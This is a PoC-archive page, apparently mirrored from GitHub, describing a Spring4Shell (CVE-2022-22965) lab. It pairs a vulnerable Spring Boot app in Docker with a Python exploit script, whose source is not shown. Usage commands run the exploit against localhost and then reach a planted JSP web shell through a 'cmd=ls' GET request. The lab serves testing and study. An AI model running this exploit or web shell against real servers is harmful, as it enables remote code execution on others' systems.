关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
介绍
# :space_invader: CVE-2022-22965
This is a proof of concept of an exploit for [CVE-2022-22965 (spring4shell)](https://www.cve.org/CVERecord?id=CVE-2022-22965) vulnerability.
It is composed by:
* A vulnerable Springboot application;
* An exploit script written in python;
* A safe app for test that the exploit doesn't work;
* A dockerfile for running the vulnerable application and test the exploit;
# :wrench:Collaborators
* [:it:] [Mario Offertucci](https://github.com/mariomamo);
* [:it:] [Antonio Donnarumma](https://github.com/AnItalianMan).
# :gear: Prerequisites
* [Docker](https://www.docker.com/): It is used for running a tomcat container with the Springboot application;
* [Python](https://www.python.org/downloads/): It is used for running the exploit;
# :one: Running the Springboot application
Inside the project root folder there is a Dockerfile that creates a tomcat image and copies the ```vulnerable_app/target/spring4shell.war``` and ```safe_app/target/safeapp.war``` file inside ```/usr/local/tomcat/webapps``` folder, so you just have to build the image and start the container.
### Build the tomcat image
```bash
docker build -t cve_2022_22965 .
```
### Start the container
```bash
docker run -p 8080:8080 -d --name springshell cve_2022_22965
```
### Check if the application is responding
```bash
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson
```
If you see this response
```bash
This is Elliot Alderson
```
Then the application is up and running.
# :two: Now you can run the exploit
```bash
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit
```
You can optionally specify the injected jsp file name but it is not mandatory.
Example
```bash
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp
```
If you don't specify a name a randome one will be generated.
You will see the following in the command shell
<img src="img-readme/shell.png"><br>
After the exploit you can send a command also via HTTP GET request
```bash
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls
```
You have succesfully opened a shell on the victim machine! enjoy
文件快照
[4.0K] /data/pocs/9fd6f3d8ab9c477d39d8f36323b27e2d0fac8ebb
├── [4.0K] config_files
│ ├── [1.6K] context.xml
│ ├── [2.8K] tomcat-users.xml
│ └── [7.1K] web.xml
├── [ 588] Dockerfile
├── [4.0K] exploits
│ └── [9.8K] spring4shell.py
├── [4.0K] img-readme
│ └── [ 45K] shell.png
├── [4.0K] Postman collection
│ ├── [4.2K] CVE-2022-22965 (safe app).postman_collection.json
│ └── [4.2K] CVE-2022-22965 (vulnerable app).postman_collection.json
├── [2.2K] README.md
├── [4.0K] safe_app
│ ├── [ 10K] mvnw
│ ├── [6.6K] mvnw.cmd
│ ├── [1.6K] pom.xml
│ ├── [ 16] README.md
│ ├── [4.0K] src
│ │ ├── [4.0K] main
│ │ │ ├── [4.0K] java
│ │ │ │ └── [4.0K] it
│ │ │ │ └── [4.0K] unisa
│ │ │ │ └── [4.0K] cve22965
│ │ │ │ ├── [ 769] CveTestApplication.java
│ │ │ │ ├── [ 194] EvilPojo.java
│ │ │ │ └── [ 591] WeakController.java
│ │ │ └── [4.0K] resources
│ │ │ ├── [ 16] application.properties
│ │ │ └── [1.1K] banner.txt
│ │ └── [4.0K] test
│ │ └── [4.0K] java
│ │ └── [4.0K] it
│ │ └── [4.0K] unisa
│ │ └── [4.0K] cve22965
│ │ └── [ 210] CveTestApplicationTests.java
│ └── [4.0K] target
│ └── [ 17M] safeapp.war
└── [4.0K] vulnerable_app
├── [ 10K] mvnw
├── [6.6K] mvnw.cmd
├── [1.6K] pom.xml
├── [ 16] README.md
├── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] it
│ │ │ └── [4.0K] unisa
│ │ │ └── [4.0K] cve22965
│ │ │ ├── [ 769] CveTestApplication.java
│ │ │ ├── [ 194] EvilPojo.java
│ │ │ └── [ 591] WeakController.java
│ │ └── [4.0K] resources
│ │ ├── [ 16] application.properties
│ │ └── [1.1K] banner.txt
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] it
│ └── [4.0K] unisa
│ └── [4.0K] cve22965
│ └── [ 210] CveTestApplicationTests.java
└── [4.0K] target
└── [ 17M] spring4shell.war
32 directories, 31 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。